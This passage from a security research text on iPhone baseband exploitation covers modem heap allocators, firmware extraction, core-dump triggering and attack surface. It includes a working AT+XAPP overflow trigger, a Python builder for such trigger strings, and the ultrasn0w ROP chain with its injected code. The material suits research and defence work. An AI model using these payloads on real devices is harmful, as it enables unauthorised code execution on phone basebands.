    ULONG       tx_byte_pool_size;
    /* This is used to mark the owner of the byte memory pool during
       a search.  If this value changes during the search, the local search
       pointer must be reset.  */
    struct TX_THREAD_STRUCT  *tx_byte_pool_owner;

    /* Define the byte pool suspension list head along with a count of
       how many threads are suspended.  */
    struct TX_THREAD_STRUCT  *tx_byte_pool_suspension_list;
    ULONG                    tx_byte_pool_suspended_count;
    /* Define the created list next and previous pointers.  */
    struct TX_BYTE_POOL_STRUCT
                *tx_byte_pool_created_next,   
                *tx_byte_pool_created_previous;
} TX_BYTE_POOL;

The header of a memory block simply consists of a field indicating whether this particular memory chunk is free (indicated by the magic value 0xFFFFEEEE) or allocated, and a pointer back to the byte pool control block:

struct bpmem_hdr {
    uint32_t is_free_magic;   /* set to 0xFFFFEEEE if block is free */
    TX_BYTE_POOL *bpcb;       /* pointer to control block of byte memory pool */
};

The tx_byte_allocate() function, used to allocate a block of memory from a given pool, does not traverse tx_byte_pool_list directly, but rather calls a function, find_byte_block(), that does this. The same function also is called from tx_byte_release() if another thread has suspended on the pool. Coalescing does not happen directly when a block of memory is freed, but is delayed. Only the field is_free_magic of the header is updated on the call of tx_byte_release() if no other threads are waiting. Rather, coalescing of adjacent memory blocks marked as free happens in find_byte_block() in case no memory block of the requested size can be found.
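The deferred coalescing described above can be illustrated with a small toy model. This is a minimal sketch, not ThreadX code: the class name, the list-based block representation, and the splitting policy are all assumptions made for illustration. Only the overall behavior (release just marks a block free, merging happens when a search fails) follows the description in the text.

```python
# Toy model of a first-fit byte pool with deferred coalescing.
# Block layout and names are illustrative assumptions, not ThreadX internals.

class BytePool:
    def __init__(self, size):
        # Each block is [offset, size, is_free]; the list is kept in address order.
        self.blocks = [[0, size, True]]

    def _first_fit(self, size):
        for block in self.blocks:
            if block[2] and block[1] >= size:
                return block
        return None

    def _coalesce(self):
        merged = [self.blocks[0]]
        for block in self.blocks[1:]:
            last = merged[-1]
            if last[2] and block[2]:
                last[1] += block[1]      # merge adjacent free blocks
            else:
                merged.append(block)
        self.blocks = merged

    def allocate(self, size):
        block = self._first_fit(size)
        if block is None:
            self._coalesce()             # only now are free neighbours merged
            block = self._first_fit(size)
            if block is None:
                return None
        if block[1] > size:              # split off the unused tail
            index = self.blocks.index(block)
            self.blocks.insert(index + 1, [block[0] + size, block[1] - size, True])
            block[1] = size
        block[2] = False
        return block[0]

    def release(self, offset):
        for block in self.blocks:
            if block[0] == offset and not block[2]:
                block[2] = True          # just flip the flag, no merging here
                return
        raise ValueError("not an allocated block")
```

In this model, two adjacent 16-byte blocks that have been released stay separate until a later 32-byte request cannot be satisfied by any single free block; only then are they merged.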

The Qualcomm Modem Heap

Looking closely at a Qualcomm stack, you will see that AMSS actually uses several different heap implementations. Because the Iguana allocator is not used for buffers allocated by the modem stack, it does not make sense for us to describe this allocator here. Rather, we investigate the most widely used allocator, which seems to be something like a system allocator on AMSS and is assumed to be called modem_mem_alloc() judging from strings found in the amss.mbn binary.

In contrast to the previous allocators, this allocator is a best-fit allocator that is significantly more complicated than the previously described allocators and is somewhat hardened. We will not be able to describe the allocator in full detail here, but rather will concentrate on the most relevant features of it that will allow you to get a head start in further reverse-engineering:

Instead of having one list of memory chunks, the allocator keeps 31 bins of memory chunks of different sizes: These bins can accommodate memory allocations up to 0x4, 0x6, 0x8, 0xC, 0x10, 0x18, 0x20, 0x30, 0x40, 0x60, 0x80, 0xC0, 0x100, 0x180, 0x200, 0x300, 0x400, 0x600, 0x800, 0xC00, 0x1000, 0x1800, 0x2000, 0x3000, 0x4000, 0x6000, 0x8000, 0xC000, 0x10000, 0x18000 and 0x20000 respectively. The actual sizes of the blocks in the bins are 16 bytes larger than the size indicated by the bin to account for metadata and align to an 8-byte boundary. The header of a memory block looks as follows:

struct mma_header {
       uint32_t size;        /* size of allocation */
       uint32_t *next;       /* pointer to next block */
       uint8_t reference;    /* reference value to distinguish different callers */
       uint8_t blockstatus;  /* determines whether block is free or taken */
       uint8_t slackspace;   /* slack space at end of block */
       uint8_t canary;       /* canary value to determine memory corruption */
};
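The bin limits listed above follow a regular pattern (powers of two interleaved with 1.5 times the previous power of two), so they can be generated rather than typed in. The following sketch rebuilds the table and picks the smallest bin that fits a request. The function names are hypothetical, and the assumption that a request always goes to the smallest fitting bin is ours; the real allocator may behave differently.

```python
from bisect import bisect_left

# Bin limits as listed in the text: 0x4, 0x6, 0x8, 0xC, ... 0x18000, 0x20000.
BIN_LIMITS = []
for shift in range(2, 17):
    BIN_LIMITS.append(1 << shift)          # 0x4, 0x8, 0x10, ...
    BIN_LIMITS.append(3 << (shift - 1))    # 0x6, 0xC, 0x18, ...
BIN_LIMITS.append(1 << 17)                 # 0x20000

METADATA_OVERHEAD = 16   # per the text: blocks are 16 bytes larger than the bin limit


def bin_index(request):
    """Index of the smallest bin whose limit is >= request (assumed policy)."""
    if request <= 0 or request > BIN_LIMITS[-1]:
        raise ValueError("request outside the binned range")
    return bisect_left(BIN_LIMITS, request)


def block_size(request):
    """Size of the block that would back `request`, including metadata."""
    return BIN_LIMITS[bin_index(request)] + METADATA_OVERHEAD
```

For example, a 5-byte request would land in the 0x6 bin under this assumed policy.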

For free blocks the following data structure is used:

struct mma_free_block {
       struct mma_header hdr;
       /* doubly linked list of free blocks */
       struct mma_header *next_free, *prev_free;
};

The canary value used by the allocator is 0x6A. Whenever an mma_header structure is accessed, a check is performed to determine whether the canary value is still intact; if it is not, a crash is forced. This feature is mostly relevant for accidental rather than intentional memory corruptions, but it is something to keep in mind when fuzzing the stack. Another noteworthy feature for heap exploitation is that the allocator checks whether pointers passed to the modem_mem_free(ptr) function really point to a memory area used by the heap. Creating fake heap structures on the stack hence will not work.
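When working with memory dumps, it can be handy to parse block headers and flag those whose canary is not intact. The sketch below assumes the header is stored little-endian and packed without padding (12 bytes in total), in the field order of the mma_header structure shown earlier; both points are assumptions that should be verified against a real dump.

```python
import struct

# size, next, reference, blockstatus, slackspace, canary
# Assumed layout: little-endian, no padding, 12 bytes in total.
MMA_HEADER = struct.Struct("<IIBBBB")
CANARY = 0x6A


def parse_mma_header(raw, offset=0):
    """Unpack one header and verify its canary, mimicking the allocator's check."""
    size, nxt, reference, status, slack, canary = MMA_HEADER.unpack_from(raw, offset)
    if canary != CANARY:
        raise ValueError("canary mismatch: 0x%02X" % canary)
    return {
        "size": size,
        "next": nxt,
        "reference": reference,
        "blockstatus": status,
        "slackspace": slack,
    }
```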

As of iOS 5.1, the heap allocator described previously has been hardened by adding a safe-unlinking check: Before performing an unlinking operation, the allocator checks whether free_block->next_free->prev_free == free_block->prev_free->next_free.
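The effect of this check can be modelled in a few lines. This is a sketch of the comparison exactly as quoted above, applied to a hypothetical Python stand-in for the free list; it does not claim to reproduce what the allocator does after the check fails.

```python
class FreeBlock:
    """Hypothetical stand-in for struct mma_free_block."""

    def __init__(self, name):
        self.name = name
        self.next_free = None
        self.prev_free = None


def safe_unlink(block):
    # Check as quoted in the text: both neighbours must agree on what
    # sits between them before the list is modified.
    if block.next_free.prev_free is not block.prev_free.next_free:
        raise RuntimeError("free list corruption detected")
    block.prev_free.next_free = block.next_free
    block.next_free.prev_free = block.prev_free
```

In an intact list both expressions refer back to the block being unlinked, so the check passes. If an overflow has replaced next_free and prev_free with two unrelated attacker-chosen addresses, the two sides will generally differ and the classic unlink write primitive is stopped.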

Vulnerability Analysis

The previous subsections of this chapter covered the ground you need to be familiar with by providing just enough details about GSM and real-time operating systems to proceed to the core of the matter: finding exploitable vulnerabilities. Before we get there, we still need to explain a couple of operational matters to get to the actual analysis.

Obtaining and Extracting Baseband Firmware

Upgrades of the baseband firmware are performed during the normal iOS upgrade/restore process. For older iPhones, up to the 3GS as well as the iPad 1, this firmware is contained in the ramdisk image. To extract it, you need to decrypt this image, mount it, and copy the firmware image from /usr/local/standalone/firmware. To extract the iPhone 2G baseband firmware ICE04.05.04_G.fls from the decrypted iOS 3.1.3 update, you can use the following sequence of steps once you have planetbeing's wonderful xpwntool installed (you can download it from https://github.com/planetbeing/xpwn).

$ wget -q http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/061-7481.20100202.4orot/iPhone1,1_3.1.3_7E18_Restore.ipsw
$ unzip iPhone1,1_3.1.3_7E18_Restore.ipsw 018-6494-014.dmg
Archive:  iPhone1,1_3.1.3_7E18_Restore.ipsw
  inflating: 018-6494-014.dmg
$ xpwntool 018-6494-014.dmg restore.dmg -k 7029389c2dadaaa1d1e51bf579493824 -iv 25e713dd5663badebe046d0ffa164fee
$ open restore.dmg
$ cp /Volumes/ramdisk/usr/local/standalone/firmware/ICE04.05.04_G.fls .
$ hdiutil eject /Volumes/ramdisk
Note
The keys used as arguments to xpwntool in the above can be found on the iPhone Wiki (http://theiphonewiki.com/wiki/index.php?title=VFDecrypt_Keys).

For newer iPhones and the iPad 2, the baseband firmware can be directly extracted from the IPSW using unzip. In Listing 11.1, the ICE3 firmware is the version running on the X-Gold 61x in the iPhone 4, and the Trek file is used to upgrade the firmware running on the MDM6610 in the iPhone 4S.

Listing 11.1: Baseband firmwares contained in the iPhone 4S 5.0.1 update

$ unzip -l iPhone4,1_5.0.1_9A406_Restore.ipsw Firmware/[IT]*bbfw
Archive:  iPhone4,1_5.0.1_9A406_Restore.ipsw
  Length     Date   Time    Name
 --------    ----   ----    ----
  3815153  12-04-11 02:07   Firmware/ICE3_04.11.08_BOOT_02.13.Release.bbfw
 11154725  12-04-11 02:07   Firmware/Trek-1.0.14.Release.bbfw
 --------                   -------
 14969878                   2 files

The .bbfw files themselves are ZIP archives as well and contain the actual baseband firmware together with a number of loaders:

$ unzip -l ICE3_04.11.08_BOOT_02.13.Release.bbfw
Archive:  ICE3_04.11.08_BOOT_02.13.Release.bbfw
  Length     Date   Time    Name
 --------    ----   ----    ----
    72568  01-13-11 04:14   psi_ram.fls
    64892  01-13-11 04:14   ebl.fls
  7308368  12-04-11 02:07   stack.fls
    40260  01-13-11 04:14   psi_flash.fls
 --------                   -------
  7486088                   4 files

$ unzip -l Trek-1.0.14.Release.bbfw
Archive:  Trek-1.0.14.Release.bbfw
  Length     Date   Time    Name
 --------    ----   ----    ----
 19599360  12-03-11 10:06   amss.mbn
   451464  12-03-11 10:06   osbl.mbn
   122464  12-03-11 10:06   dbl.mbn
   122196  12-03-11 10:06   restoredbl.mbn
 --------                   -------
 20295484                   4 files

Here we are interested only in stack.fls for the X-Gold and in amss.mbn for the MDM66x0 chipsets. All other files are loaders, which we don't investigate further, although they may in principle contain security-critical bugs. A flaw in the signature verification of the firmware, for instance, would allow you to run different firmware on the phone and hence unlock it.
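Because .bbfw files are ordinary ZIP archives, the same listing can be produced programmatically with Python's standard zipfile module. The helper name below is hypothetical; it is a small convenience sketch, not part of any existing tool.

```python
import zipfile


def list_bbfw(path_or_file):
    """Return (member name, uncompressed size) pairs for a .bbfw archive."""
    with zipfile.ZipFile(path_or_file) as archive:
        return [(info.filename, info.file_size) for info in archive.infolist()]


def extract_member(path_or_file, member):
    """Return the raw bytes of one member, e.g. 'stack.fls' or 'amss.mbn'."""
    with zipfile.ZipFile(path_or_file) as archive:
        return archive.read(member)
```

Calling list_bbfw() on the ICE3 archive from the listing above should report the same four members that unzip -l shows.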

Loading Firmware Images into IDA Pro

Infineon .fls files are built using an official ARM compiler toolchain, either ARM RealView Development Suite (RVDS) or ARM Developer Suite (ADS), depending on the version of the baseband firmware. The ARM linker employs a so-called “scatter loading” mechanism to save flash space. In the link run, all code segments and data segments with initialized data are concatenated; optionally, segments can be compressed using one of two simple run-length encoding algorithms. A table is built with pointers to these regions and entries for regions that need to be zero-initialized. During run time, startup code iterates over this table, copies the segments to their actual locations in memory, and creates zero-initialized memory regions as specified.
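What the startup code does with the region table can be sketched as follows. The table format used here (a tuple of kind, source offset, destination address, and length) is a simplifying assumption for illustration; the real table layout differs, and the optional run-length decompression step is deliberately left out.

```python
COPY, ZERO = 0, 1   # hypothetical region kinds for this model


def scatter_load(image, table, ram_base, ram_size):
    """Apply copy and zero-init entries to a modelled RAM area."""
    ram = bytearray(b"\xAA" * ram_size)   # 0xAA marks untouched RAM in this model
    for kind, src, dst, length in table:
        start = dst - ram_base
        if start < 0 or start + length > ram_size:
            raise ValueError("region outside modelled RAM")
        if kind == COPY:
            if src + length > len(image):
                raise ValueError("source region outside image")
            ram[start:start + length] = image[src:src + length]
        elif kind == ZERO:
            ram[start:start + length] = bytes(length)
        else:
            raise ValueError("unknown region kind")
    return ram
```

A loader module or script that relocates the firmware to its in-memory layout has to perform essentially these two operations for every table entry before any meaningful disassembly is possible.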

This means that before you can perform any meaningful analysis on the .fls files, you need to perform the same steps the startup code does. You have several ways to do this: the first is described in an IDA Pro tutorial and involves using the QEMU emulator to simply execute the startup sequence. The second way to get the firmware relocated to its in-memory layout is by using a script or a loader module. A universal scatter loading script written by roxfan has been circulating among iPhone hackers for a while. We have decided to write and release an IDA Pro module (flsloader) for iPhone baseband firmware that incorporates this functionality. You can download this code from the companion website of the book (www.wiley.com/go/ioshackershandbook). There you also find a script make_tasktable.py that automatically identifies the table of tasks that are created by, for instance, Application_Initialize() on Nucleus PLUS or tx_application_define() on ThreadX. This greatly enhances IDA Pro's auto-analysis.

Qualcomm's firmware files are in standard Executable and Linkable Format (ELF); you do not need a custom IDA Pro loader module to load them.

Application/Baseband Processor Interface

If you look closely at the connection between the baseband processor and the application processor, it becomes clear that talking to the AT command interpreter doesn't happen directly over a serial line, but rather that many things are multiplexed over either a serial line (Infineon-based chips) or over USB (Qualcomm). For the Infineon basebands, the multiplexing is done in a kernel extension com.apple.driver.AppleSerialMultiplexer according to 3GPP 27.010. For Qualcomm baseband processors, a Qualcomm proprietary protocol called Qualcomm MSM Interface (QMI) is used. Source code for an implementation of QMI exists in the Linux kernel fork for the MSM platform created by the CodeAurora Forum (https://www.codeaurora.org/contribute/projects/qkernel).

Stack Traces and Baseband Core Dumps

For analyzing vulnerabilities — and more importantly, for actually exploiting them — it is extremely useful to have some visibility of the state of the system at the time of the crash and, if possible, at run time.

For iOS devices with an Infineon baseband, you can use the AT+XLOG command to obtain a log of baseband crashes and their stack traces. Even better, on the X-Gold chips there's a way to trigger a core dump of the baseband memory without actually needing to exploit a bug first. To do this, you first need to enable the functionality, which you can do with a special dial string through the Phone dialer (this is parsed by CommCenter). By calling the number *5005*CORE#, you can enable the core dump functionality (#5005*2673# turns it off again and *#5005*2673# shows the status of the setting). Using minicom, you can send the AT command AT+XLOG=4 to the baseband to trigger an exception; this will cause the baseband memory to be dumped. This dump is segmented by memory region and will be stored in a directory of the form log-bb-yyyy-mm-dd-hh-mm-ss-cd in /var/wireless/Library/Logs/CrashReporter/Baseband:

# cd /var/wireless/Library/Logs/CrashReporter/Baseband/log-bb-2012-01-17-11-36-07-cd
# ls -l
total 9544
-rw-r--r-- 1 _wireless _wireless   65544 Jan 17 11:36 0x00090000.cd
-rw-r--r-- 1 _wireless _wireless   16760 Jan 17 11:39 0x40041000.cd
-rw-r--r-- 1 _wireless _wireless  262152 Jan 17 11:40 0x40ac0000.cd
-rw-r--r-- 1 _wireless _wireless  262152 Jan 17 11:40 0x40b00000.cd
-rw-r--r-- 1 _wireless _wireless  539372 Jan 17 11:36 0x60700000.cd
-rw-r--r-- 1 _wireless _wireless 8564860 Jan 17 11:39 0x60784ae4.cd
-rw-r--r-- 1 _wireless _wireless   16392 Jan 17 11:36 0xffff0000.cd

If you have done everything correctly, you will see a message stating Baseband Core Dump in Progress on the screen of your iPhone for a number of seconds.
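Since each dump file is named after the base address of the memory region it contains, a small helper can map an address of interest to the file that most likely holds it. This is a sketch with hypothetical function names; it does not parse the file contents and makes no assumption about any header inside the .cd files.

```python
import re

# File names follow the pattern seen in the listing above: 0x<8 hex digits>.cd
SEGMENT_NAME = re.compile(r"^0x([0-9a-fA-F]{8})\.cd$")


def segment_bases(filenames):
    """Return {base_address: filename} for every core dump segment file."""
    bases = {}
    for name in filenames:
        match = SEGMENT_NAME.match(name)
        if match:
            bases[int(match.group(1), 16)] = name
    return bases


def segment_for(bases, address):
    """Pick the segment with the highest base that is not above `address`.

    This only selects a candidate file; whether the address really lies
    inside it depends on the segment length, which is not modelled here.
    """
    candidates = [base for base in bases if base <= address]
    if not candidates:
        return None
    return bases[max(candidates)]
```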

Attack Surface

This section evaluates the attack surface that the baseband processor provides. For local exploits, functions exposed through the AT command interpreter were attacked in soft unlocks, but this is by no means the only way to perform a local attack. Another vector that has been used successfully in the past, in an exploit called JerrySIM, was the interface between the SIM and the baseband processor. Considerable complexity is hidden in this interface, especially given the fact that SIM Application Toolkit (STK) and USIM Application Toolkit (USAT) messages from the SIM need to be parsed and processed. For Qualcomm basebands, the USB stack might be a viable target for local attacks as well. According to mailing list posts on the linux-arm-msm mailing list, it seems that Qualcomm is using a ChipIdea core with the corresponding stack. Interestingly, the baseband firmware for the X-Gold 61x chipset also includes a USB stack; however it does not seem to be accessible from the application processor.

Note
A soft unlock is a nonpermanent modification of the cellular stack that needs to be reapplied every time the baseband processor is restarted, usually by injecting a task. This is in contrast to the earlier unlocks — which could be called hard unlocks — that permanently altered the baseband firmware stored in flash memory.

When mapping the attack surface of the cellular stack exposed over the air interface, you start at the lowest layer. Decoders of audio data are a frequent source of memory corruption bugs, even in the domain of GSM stacks. Look carefully and you will be able to find examples of voice codecs that send length fields over the air, which may or may not be trusted by the cellular stack in question. However, the downside of such bugs is that they need an established voice connection as a precondition. Up in the data link layer, memory corruption bugs are possible as well; however, frames are too short (17 bytes) to make exploits easy.

Arriving at the network layer you are overwhelmed by a Smörgåsbord of opportunities. To understand, you have to look at 3GPP 24.008 — this 3GPP specification supersedes GSM specification 04.08 — to see how messages on layer 3 are encoded: Messages can be up to 253 bytes long and encoded in different ways. The designers of this fine standard were apparently influenced by ASN.1: They allow variable-length fields for a wide variety of protocol messages. In a number of cases even entities that are explicitly stated to be of fixed length are encoded in a format that transmits their length over the air, creating ambiguity for the parser. However, this is not the only fruitful area; going even higher in the sublayers of layer 3 you find plenty of opportunities to corrupt memory in implementations in the handling of supplementary data and the parsing of short messages. Last but not least, spatial memory corruptions are not the only kind cellular stacks allow. Rather, the fact that many parts of the GSM stack are driven by explicit, large, and complicated state machines gives implementers a more than sufficient chance of introducing temporal memory corruptions such as use-after-frees into their codebase as well, especially considering the fact that allocations and deallocations of some data structures in these state machines are not necessarily done by the same task.
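To make the danger of over-the-air length fields concrete, here is a sketch of a parser for a deliberately simplified tag-length-value encoding. It is not the actual 3GPP 24.008 encoding, which knows several element formats; the tag values and the per-tag maximum table are hypothetical. The point is the two checks a robust parser needs: the length must fit the received message, and it must not exceed what the specification allows for that element.

```python
def parse_tlv(buf, max_lengths):
    """Parse consecutive (tag, length, value) elements with bounds checks.

    `max_lengths` maps a tag to the largest value length the (hypothetical)
    specification permits for it; tags not listed are not length-limited.
    """
    elements = []
    pos = 0
    while pos < len(buf):
        if pos + 2 > len(buf):
            raise ValueError("truncated element header")
        tag, length = buf[pos], buf[pos + 1]
        pos += 2
        if pos + length > len(buf):
            raise ValueError("length runs past end of message")
        limit = max_lengths.get(tag)
        if limit is not None and length > limit:
            raise ValueError("element 0x%02X longer than allowed" % tag)
        elements.append((tag, bytes(buf[pos:pos + length])))
        pos += length
    return elements
```

A stack that copies `length` bytes into a fixed-size buffer without the second check is exactly the kind of code this section is looking for.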

Note
For an example of large and complicated state machines, refer to Figure 4.1 (Overview mobility management protocol/MS Side) in 3GPP 24.008.

However, identifying and reproducing temporal memory corruptions without source code or instrumentation for the cellular stack is a hard problem.

Static Analysis on Binary Code Like it's 1999

Because of the number of functions in the IDA Pro databases of the baseband firmware, performing even a shallow audit of the codebase for memory corruptions will be a humongous task.

A straightforward way to find potential memory corruptions in baseband stacks is by looking for functions that perform memory block transfers such as memcpy(), memmove(), and friends, and investigating which of these functions an attacker can use to obtain sufficient control over the length and/or the destination of the transfer. This task is aided by the fact that assertions are placed all over the codebase that log the filename and the line number (in some cases a message and a result code are included as well) whenever situations crop up that were not expected; these strings are even present in the production versions of the baseband firmware.

Note
More advanced ways exist to find memory writes that can lead to potential memory corruptions, for instance by loop detection using dominator trees. For more information see Halvar Flake's slide deck “More fun with Graphs” from Blackhat Federal 2003 and Pete Silberman's article on loop detection in the first volume of the Uninformed journal.

This way of auditing was very successful on a number of stacks; however, the vast majority of memory copies in the IFX stack transfer constant-length blocks.

Specification-Guided Fuzz Testing

A different approach to finding potential memory corruptions is to read the GSM and 3GPP specifications carefully and take note of all messages transmitted that have variable-length elements. For each of these messages, you can then try sending such a message with one or more elements having a length not supported by the specification (this may be larger than the allowed maximum or smaller than a minimum specified) and observing whether a crash is triggered on the device. A number of problems exist with this approach, however. First, although it is easy to fuzz test messages that operate in a “stateless” fashion, such as functions related to Mobility Management, things become trickier if you try to find bugs in the Call Control sublayer, for example. Here certain messages are available only for established calls. Second, you will need to have a fairly complete understanding of the protocol you are trying to fuzz. With GSM this is difficult, as the protocol is distributed across thousands of standard documents, and you might easily miss the relevance of some of them. In fact, as there are several revisions of most standards, you might even miss something if you're not aware of all revisions as you do not know a priori which revision of the GSM standard a certain stack conforms to. Last but not least you will deal with a large number of crashes that turn out to be non-exploitable and it will take you a long time to understand which of your crashes are. In general, meaningful fuzz testing is hard to perform with cellular stacks because the specifications are full of explicitly specified state machines that make many code paths hard to reach.

Note, however, that CVE-2010-3832, the bug described later in this chapter, was indeed found by a procedure that could be called “specification-guided fuzz testing.”
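The core of this procedure, generating elements whose length field falls just outside the range the specification permits, can be sketched in a few lines. The encoding is again a simplified tag-length-value form with a one-byte length, and the function name and fill byte are hypothetical; actually delivering such messages requires a rogue base station setup that is not shown here.

```python
def length_mutations(tag, min_len, max_len, fill=0x41):
    """Yield elements whose length violates the allowed range [min_len, max_len]."""
    candidates = {max_len + 1, 0xFF}           # just above the maximum, and the extreme
    if min_len > 0:
        candidates.update({0, min_len - 1})    # empty, and just below the minimum
    for length in sorted(candidates):
        if length > 0xFF or min_len <= length <= max_len:
            continue                           # not encodable, or actually valid
        yield bytes([tag, length]) + bytes([fill]) * length
```

Each generated element would be embedded into an otherwise valid message, sent to the device, and the device observed for a crash.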

Exploiting the Baseband

This section examines two examples of memory corruption vulnerabilities that can be used to take control over the baseband. The first one is a local vulnerability that can be exploited through the AT command interpreter. The second one is a vulnerability that can be exploited over the air interface to attack vulnerable iPhones remotely from a rogue base station in their proximity.

A Local Stack Buffer Overflow: AT+XAPP

The AT+XAPP vulnerability is a classic stack buffer overflow that has been used as one of the injection vectors by the ultrasn0w unlock. It is present in all S-Gold 2 basebands, the X-Gold 608 basebands up to versions 05.13.04 (iPhone 3G/3GS) and 06.15.00 (iPad), as well as in the X-Gold 61x baseband in version 01.59.00. The vulnerability was independently discovered by @sherif_hashim, @Oranav, @westbaer, and geohot by testing AT commands for crashes.

Having an easily exploitable local memory corruption is a very useful step before investigating remote vulnerabilities. The following example shows the effect of the PoC trigger on an iPhone 2G running the ICE baseband version 04.05.04_G:

# ./sendmodem 'AT+XAPP="####################################4444555566667777PPPP"'
Sending command to modem: AT
------.+
AT
OK
Sending command to modem:
AT+XAPP="####################################4444555566667777PPPP"
-.+
# ./sendmodem 'AT+XLOG'
Sending command to modem: AT
-.+
AT
OK
Sending command to modem: AT+XLOG
-........+
AT+XLOG
+XGENDATA: "DEV_ICE_MODEM_04.05.04_G    
"

+XLOG: Exception Number: 1
Trap Class: 0xBBBB (HW PREFETCH ABORT TRAP)
System Stack:
            0xA0086800
            [176 DWORDs omitted]
            0x00000000

Date: 15.01.2012
Time: 05:47
Register:
r0:   0x00000000   r1:   0x00000000 r2:   0xFFFF231C
r3:   0xB0101FF9   r4:   0x34343434 r5:   0x35353535
r6:   0x36363636   r7:   0x37373737 r8:   0x00000000
r9:   0xA00028E4   r10:  0xB00AC938 r11:  0xB00B67CC
r12:  0xA0114F95   r13:  0xB00B2CF4 r14:  0xA010E97D
r15:  0x50505054
SPSR: 0x40000013  DFAR:  0x00000001 DFSR: 0x00000005

OK
#
Note
This example uses sendmodem from http://code.google.com/p/iphone-elite/wiki/sendmodem to communicate with the baseband. If you want to interface with the AT command parser on the iPhone 4 GSM, use /dev/dlci.spi-baseband.extra_0 instead of /dev/tty.debug.

As you can see, this overflow can be used to set registers r4–r7 as well as the program counter. You can easily use this overflow to inject your own code into the baseband.
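The relationship between the trigger string and the register dump can be reproduced with a short helper that builds such a string from chosen register values. This is a sketch: the function name is hypothetical, the filler length must be taken from the trigger string shown above for the firmware in question, and the set of rejected bytes is an assumption.

```python
import struct

FORBIDDEN = (0x00, 0x20, 0x22)   # assumed: NUL, space, and the closing quote


def build_xapp_trigger(filler_len, r4, r5, r6, r7, pc):
    """Build an AT+XAPP string that loads r4-r7 and the program counter."""
    # ARM is little-endian here: the characters '4444' end up as 0x34343434.
    body = b"#" * filler_len + struct.pack("<5I", r4, r5, r6, r7, pc)
    if any(byte in FORBIDDEN for byte in body):
        raise ValueError("value contains a byte the AT parser would mangle")
    return b'AT+XAPP="' + body + b'"'
```

Note that the crash log above reports r15 as 0x50505054, four more than the 0x50505050 encoded by PPPP, so the logged program counter should not be expected to match the injected value exactly.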

The ultrasn0w Unlock

Here you investigate how the AT+XAPP overflow was used by the ultrasn0w unlock to circumvent the network lock on the iPhone 4.

First you have to understand the logistics of the ultrasn0w package. This unlock works by injecting a dynamic library into the CommCenter process using the MobileSubstrate framework. After checking that it is talking to a supported version of the baseband software, this dynamic library sends a sequence of AT commands to the baseband processor that exploits the AT+XAPP overflow and places a sequence of payloads there. The final goal is to intercept and change messages sent and received by the so-called SEC thread (func_sec_process) in order to fake an unlocked state to the rest of the cellular stack. In previous versions of ultrasn0w for the X-Gold 608 chipset, this was achieved by creating a separate Nucleus task that intercepted mailbox messages and replaced them. In the ultrasn0w version for the iPhone 4, a different route is taken: The unlock overwrites parts of ThreadX that are responsible for the interthread communication of the SEC thread. This section covers the tricks used to achieve this; the latest version of ultrasn0w for the iPhone 4 is by far the most elaborate unlock in existence, bordering on art.

If you disassemble the dynamic object ultrasn0w.dylib located in /Library/MobileSubstrate/DynamicLibraries on your iPhone after the installation of ultrasn0w, you find an array of pointers to strings called unlock_strings that points to four different instantiations of the at+xapp overflow exploited on the baseband processor. Dissecting these allows you to unravel the unlock and appreciate its level of sophistication.

Here is the initial code injection. Already in the first unlock string sent, you might notice something unexpected; instead of code being injected directly, a ROP chain comprised of a single gadget (0x6014A0F1) is used to stitch together a piece of code at the very high end of memory:

0x00000000            DCD 0x34343434      ; R4 [unused]
0x00000004            DCD 0x35353535      ; R5 [unused]
0x00000008            DCD 0x36363636      ; R6 [unused]
0x0000000C            DCD 0x37373737      ; R7 [unused]
0x00000010            DCD 0x6014A0F3      ; POP {R3-R5}, PC
0x00000014            DCD ‘UUUU’          ; R3 [unused]
0x00000018            DCD 0x47804807      ; R4 [code/data]
0x0000001C            DCD 0xFFFF1FD0      ; R5 [address]
0x00000020            DCD 0x6014A0F1      ; STR R4, [R5]
0x00000020                                ; POP {R3-R5}, PC
0x00000024            DCD ‘UUUU’          ; R3 [unused]
0x00000028            DCD 0xBC0F1C07      ; R4 [code/data]
0x0000002C            DCD 0xFFFF1FD4      ; R5 [address]
0x00000030            DCD 0x6014A0F1      ; STR R4, [R5]
0x00000030                                ; POP {R3-R5}, PC
[...]
0x000000B4            DCD ‘UUUU’          ; R3 [unused]
0x000000B8            DCD 0x601FD9FC      ; R4 [code/data]
0x000000BC            DCD 0xFFFF1FF8      ; R5 [address]
0x000000C0            DCD 0x6014A0F1      ; STR R4, [R5]
0x000000C0                                ; POP {R3-R5}, PC
0x000000C4            DCD ‘3333’          ; R3 [unused]
0x000000C8            DCD ‘4444’          ; R4 [unused]
0x000000CC            DCD ‘5555’          ; R5 [unused]
0x000000D0            DCD 0xFFFF1FD1      ; entry point
0x000000D4            DCD 0xFFFF04D0      ; [2nd stage] R0 (memcpy dst)
0x000000D8            DCD 0x6087A7BC      ; [2nd stage] R1 (memcpy src)
0x000000DC            DCD 0x1010159       ; [2nd stage] R2 (1st summand of len)
0x000000E0            DCD 0xFEFEFEFF      ; [2nd stage] R3 (2nd summand of len)

Each call of the ROP gadget consumes four arguments from the stack that are placed into registers r3-r5 and PC. After 11 words have been written, the execution flow is redirected to the Thumb code created. Following is the disassembly:

0xFFFF1FD0                         CODE16
0xFFFF1FD0 07   48                 LDR             R0, =0x6018135C
0xFFFF1FD2 80   47                 BLX             R0     ; call disable_ints
0xFFFF1FD4 07   1C                 MOVS            R7, R0 ; preserve CPSR
0xFFFF1FD6 0F   BC                 POP             {R0-R3}; get args for memcpy
0xFFFF1FD8 D2   18                 ADDS            R2, R2, R3 ; fix up length
0xFFFF1FDA 07   4B                 LDR             R3, =0x601FD9FC
0xFFFF1FDC 98   47                 BLX             R3; call memcpy
0xFFFF1FDE 38   1C                 MOVS            R0, R7; get preserved CPSR
0xFFFF1FE0 04   49                 LDR             R1, =0x6018136C
0xFFFF1FE2 88   47                 BLX             R1 ; call restore_cpsr
0xFFFF1FE4 01   49                 LDR             R1, =0x72883C6C ; for clean…
0xFFFF1FE6 8D   46                 MOV             SP, R1; continuation
0xFFFF1FE8 48   1A                 SUBS            R0, R1, R1; clear R0
0xFFFF1FEA F0   BD                 POP             {R4-R7,PC} ; no crash, please
0xFFFF1FEA               ; ---------------------------------------
0xFFFF1FEC 6C   3C 88 72 new_sp          DCD 0x72883C6C; DATA XREF: 0xFFFF1FE4
0xFFFF1FF0 5C   13 18 60 P_disable_ints  DCD 0x6018135C; DATA XREF: 0xFFFF1FD0
0xFFFF1FF4 6C   13 18 60 P_restore_cpsr  DCD 0x6018136C; DATA XREF: 0xFFFF1FE0
